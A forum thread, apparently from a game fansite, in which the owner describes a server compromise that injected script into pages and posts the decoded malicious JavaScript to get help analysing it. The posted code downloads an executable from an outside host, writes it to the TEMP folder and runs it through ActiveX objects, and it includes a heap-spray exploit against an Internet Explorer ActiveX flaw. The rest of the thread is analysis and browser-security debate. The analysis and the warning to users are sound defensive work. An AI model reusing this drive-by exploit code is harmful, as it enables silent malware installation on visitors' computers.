Site hack

[Pskonejott]

It appears the servers at my host have been compromised and are appending some javascript code to most files. The code is encrypted and uses IE exploits to try and install some stuff. As far as I'm aware you're safe if you use Firefox or Opera, it should only cause the site to act a little screwey if you're using these browsers. I'm doing what I can to get it sorted out.

Most webmasters do what they can to keep their servers and sites secure, however problems will always arise so it's up to each user to do their own part for the security of their system. IE causes problems itme and time again, a while ago World of Tibia had some banners sneak in with an IE exploit, not long ago Tibianews had shortnews warning of the dangers of IE exploits. If you're going to use IE you're going to have problems, change to something else. The old saying still stands: Friends don't let friends use Internet Explorer.

I'll fix the search and sort bugs that are reported in this forum after the server hack is sorted out.

[Sketchy]

Hi Pskonejott. I am not sure if you are aware however there is a thread over on the offical tibia.com forums about your site using the exploit. You can find it at thread jump 1529183.

Anyway in case you don't already know the appended scripts are loading an iframe which connects to a PHP file. The PHP file then sends its own Javascript script to the browser which is then run and decodes a string and writes it to the document. This decoded string would be another script which uses the exploit and such. I haven't yet had the chance to decode it so I'm not sure what its exactly doing. If you like I could give you the IP address of the server the PHP file is located on and send you a copy of the script it sends.

[Cuisdy]

It would be great if you could post this on the internal Tutor Board. Not only because tutors usualy care for botters and such and use your tools, but also because they could spread the warning.



Kind regards.

[Pskonejott]

Well, pskonejott.com is not a supported fansite so it really has no place on the tibia.com forums, I certainly won't discuss it there. The appended script is actually encrypted and uses javascript to decrypt it. It's not tibia related and its something that you can pick up at any number of other sites, or even any tibia fansites if someone wanted to spread it. It's unfortunate that it's causing problems for pskonejott.com, on the upside more people might change from IE to Firefox :P

[Pskonejott]

Okay, so everything's encoded and I've been going through decoding it to figure out what it does. The first file it loads is http://hard-tsunami.info/lerring/in.php?adv=7 I didn't bother to reverse engineer the algorithm it uses, I just had it document write encode(u) rather than u and then used http://scriptasylum.com/tutorials/en...de-decode.html Following is what it decodes to, I can't follow the code but maybe someone can shed some light on exactly what it's trying to do. I didn't bother to go on and decode http://hard-tsunami.info/lerring/funny.php?adv=7

<SCRIPT language="javascript">
var url="http://hard-tsunami.info/lerring/funny.php?adv=7";

var bb1031966172ff = url+'&spl=rds';
function CreateO(o, n) {
var r = null;

try { eval('r = o.CreateObject(n)') }catch(e){}

if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}

return(r);
}

function Go(a) {
var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
var o = CreateO(a, "ADO"+"DB.Str"+"eam");
var e = s.Environment("Process");

var bb725395455ff = null;
var bin = e.Item("TEMP")+ "\\" + "rf969229767mm.exe";
var bb1987268940ff;

try { bb725395455ff=new XMLHttpRequest(); }
catch(e) {
try { bb725395455ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
catch(e) {
bb725395455ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
}
}

if (! bb725395455ff) return(0);

bb725395455ff.open("GET", bb1031966172ff, false)
bb725395455ff.send(null);
bb1987268940ff = bb725395455ff.responseBody;

o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(bb1987268940ff);
o.SaveToFile(bin, 2);

s.Run(bin,0);
}

var i = 0;
var bb989414148ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
null);

while (bb989414148ff[i]) {
var a = null;

if (bb989414148ff[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + bb989414148ff[i].substring(1, bb989414148ff[i].length - 1));
} else {
try { a = new ActiveXObject(bb989414148ff[i]); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WSc"+"ript.She"+"ll");
if (b) {
Go(a);
//return(0);
}
} catch(e){}
}
i++;
}






var bb2086792372ff = url+'&spl=fi';
var AfgsARtg = 0x0c0c0c0c;
var bb1816082347ff = '';

for (i = 0; i < bb2086792372ff.length; )
{
bb1816082347ff += '%u' + ((i+1<bb2086792372ff.length)?bb2086792372ff.charCo deAt(i+1).toString(16):'00')+bb2086792372ff.charCo deAt(i).toString(16);
i = i + 2;
}

qwerty = unescape("***REMOVED ESCAPED TEXT SINCE FORUMS CAN'T DISPLAY IT***");
erty = unescape(bb1816082347ff);
var bb1695778523ff = qwerty+erty;
var rf1584506540mmize = 0x400000;
var desrtfgk = bb1695778523ff.length * 2;
var bb1821299702ffSize = rf1584506540mmize - (desrtfgk+0x38);
var bb1821299702ff = unescape("ఌఌ");
bb1821299702ff = getbb1821299702ff(bb1821299702ff,bb1821299702ffSiz e);
rf1584506540mm = (AfgsARtg - 0x400000)/rf1584506540mmize;
memory = new Array();
for (i=0;i<rf1584506540mm;i++)
{
memory[i] = bb1821299702ff + bb1695778523ff;
}
var gov = '';
var s = gov;
s += 0x7ffffffe;
for ( i = 0 ; i < 256 ; i++)
{
try{
var g = new ActiveXObject('WebVi'+'ewFol'+gov+'derI'+gov+'con. WebVie'+gov+'wFol'+'derI'+'con.1');
g.setSlice(s, AfgsARtg, AfgsARtg, AfgsARtg );
}catch(e){}
}

function getbb1821299702ff(bb1821299702ff, bb1821299702ffSize)
{
while (bb1821299702ff.length*2<bb1821299702ffSize)
{
bb1821299702ff += bb1821299702ff;
}
bb1821299702ff = bb1821299702ff.substring(0,bb1821299702ffSize/2);
return bb1821299702ff;
}
</script>

[Steven]

Is IE7 more secure then FireFox?

[Sketchy]

I'm no Javascript expert, honestly I've hardly ever touched it, though from what I have made out is when the script runs it attempts to create several objects from class IDs and then attempts to connect to the funny.php file via HTTP. When connected the funny.php file will send executable data which the script then saves as an executable file in the environment's(Windows probably) temporary folder and then proceeds to run it.

After saving and running the executable I am not exactly sure what its doing, all I know is it is creating ActiveX objects and then calling some function in them.

As I said though I'm not a Javascript expert, but I do have alot of knowledge with other programming languages to know some of what is happening.

[Tawen]

Is IE7 more secure then FireFox?

No, Firefox is more secured than any kind of IE

[Cuisdy]

I accessed your site now and had no freeze like before (wich was the only noticeable effect of the virus using Firefox). Is it fixed already? Note that it didn't even try to access hard-tsunami.com this time.

[Pskonejott]

Yes, the problem has been solved. It was a cpanel exploit that injects code into mod_layout that is loaded by default with apache. cpanel is an extremely popular server frontend and there are a large number of sites having this problem so you're probably going to see this code on other sites too. I'll try and find out exactly what the code tries to do on your PC.

[Pskonejott]

Okay, well the best I can do is to tell you that it's using the 0day IE exploit that's been known for 9 months and is still unpatched by Microsoft. If you use any other browser you should be safe. As for exactly what it was trying to run, I don't use IE so I have no idea and I haven't been able to track down any info. But it's a remote code execution exploit so they can do anything they want to.

You're going to run into IE exploits time and time again, guys do yourself a favour and use a different browser. It's extremely difficult to keep a web server secure, even cpanel did not know about this exploit so it means there's lots of other sites around experiencing the same problem.

[Ryshu]

Well it looks like I'm going back to Firefox again >.> I really liked IE 7.

But I'm just curious: how seriously will this F up my computer? Cus I go to your site a lot, so I definately got this gay thing.

[Wayan]

phew~ used to go to Psk's a lot a while back, but since i havent been playing much i havent bother seeing how much time ive spent online, lol

anyhow, hope that the problem is solved, and that no one got any damage from going to the website.

safest thing would be to format c: i would immagine. but thats just a pain in the ass... unless you find your acc cleand out >.<

but it might have nothing to do with tibia, and be after something else eg. c-card, or personal info.. either way, it cant be something good :S

gl at figuring out what the code is trying to do, and if its of any great danger to tibia, or anything else...

w.

[Moises Del'Vodka]

No, Firefox is more secured than any kind of IE

Totally agreed... use always Firefox.

[Caelholdt]

Firefox is not MORE secure, thinking that would be false. It's getting more and more dangerous to use Firefox by the day, better switch to another browser

[Sketchy]

Firefox is not MORE secure, thinking that would be false. It's getting more and more dangerous to use Firefox by the day, better switch to another browser

Thinking IE is more secure than Firefox would be false. The fact is there are far less known security vulnerabilities in Firefox, add to this the fact that once found and reported they are likely to be fixed as soon as possible(depending on how sevre the vulnerability is). IE on the other hand has more known vulnerabilities, some of which do not get patched for months after being discovered(such as the exploit Pskonejott stated in this thread). Also due to Firefox's open-source nature where anyone can gain access to the source code bugs are much easier to find, report and then ultimately fixed, the same cannot be said about IE which is a closed-source piece of software.

I disagree that Firefox is getting more dangerous to use, sure bugs may be found but they are also being fixed shortly after. I see no reason why people should switch to using another browser as you suggested, Firefox simply put is one of, if not, the safest there is right now.

[Abadu]

Humm... my friend goy hacked couse of your site , but it's not your fault ;D

@Cuisdy:Now that darconian got deleted the S.o.S will win the war

[eatfoo]

this is a big HA! to everyone on this forum who has been going on the campain trail for IE. please listen to the smart man.


CHANGE TO FIRE FOX

www.firefox.com.
in addition to being more secure it runs faster and u can use these cool greesemonkey scripts.

[Dragonslayer]

I use a COMPAQ model - probably around 2002 model with IE 5.5 (i think) on it. Can I download FireFox from any site? or is it a hardware pay lots of money for item?

[eatfoo]

fire fox is free


www.firefox.com